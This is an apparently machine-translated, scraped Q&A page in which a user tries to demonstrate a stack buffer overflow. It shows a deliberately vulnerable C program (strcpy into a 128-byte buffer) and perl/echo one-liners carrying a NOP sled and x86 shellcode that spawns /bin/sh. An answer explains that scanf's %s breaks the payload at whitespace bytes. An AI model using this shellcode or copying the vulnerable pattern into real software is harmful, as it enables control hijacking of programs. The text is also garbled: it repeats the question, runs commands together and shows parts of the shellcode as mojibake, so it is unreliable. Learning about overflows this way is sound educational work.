Memory 使用\x表示法在内存中存储NOPs指令
我试图在输入中添加一些外壳代码,以演示导致控制劫持的缓冲区溢出。 这里是程序Memory 使用\x表示法在内存中存储NOPs指令,memory,gcc,c,hex,Memory,Gcc,C,Hex,我试图在输入中添加一些外壳代码,以演示导致控制劫持的缓冲区溢出。 这里是程序 int foo(char *mainbuff) { char foobuff[128]; strcpy(foobuff, mainbuff); printf("foobuff new value is %s\n", foobuff); return 0; } int main() { char mainbuff[256]; printf("Please enter value of mainbuff\n\n");
int foo(char *mainbuff)
{
char foobuff[128];
strcpy(foobuff, mainbuff);
printf("foobuff new value is %s\n", foobuff);
return 0;
}
int main()
{
char mainbuff[256];
printf("Please enter value of mainbuff\n\n");
scanf("%s", mainbuff);
foo(mainbuff);
printf("Program is exitting normally!!\n\n\n");
return 0;
}
\0x3039785c09x\\x90stdin0x5c、0x78、0x39、0x300x3039785c您可以尝试
echo-e“\x90\x90…”/a.outpython-c'print“\x90…”./yourprogramperl-e'print”\x90“x112。”\xb8\x32\x2f\x73\x68\x08\x50\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\x52\x53\x89\xe1\x89\xd0\x0b\xcd\x80\x10\xd2\xff\xff”�����������������������������������������������������������������������������������������������������������������2/sh�Ph/箱��1.�RS���а ���与perl-e'print“\x90”x112.”\xb8\x32\x2f\x73\x68\xc1\xe8\x08\x50\x68\x2f\x62\x69\x6e\x89\xe3\x31\xd2\x52\x53\x89\xe1\x89\xd0\xb0\x0b\xcd\x80\x50\x50\x60\x62\x42\xff\xff”发生的情况相同,因为现在我已经更改了address@aneela“不在同一条线上”的问题由外壳代码中的白色字符\x0c
和\x0b
引起。然而,正如man scanf
所说的那样,%s匹配一系列非空白字符,这将在该位置打断您的外壳代码。谢谢@Gen Chen,这正是我所缺少的。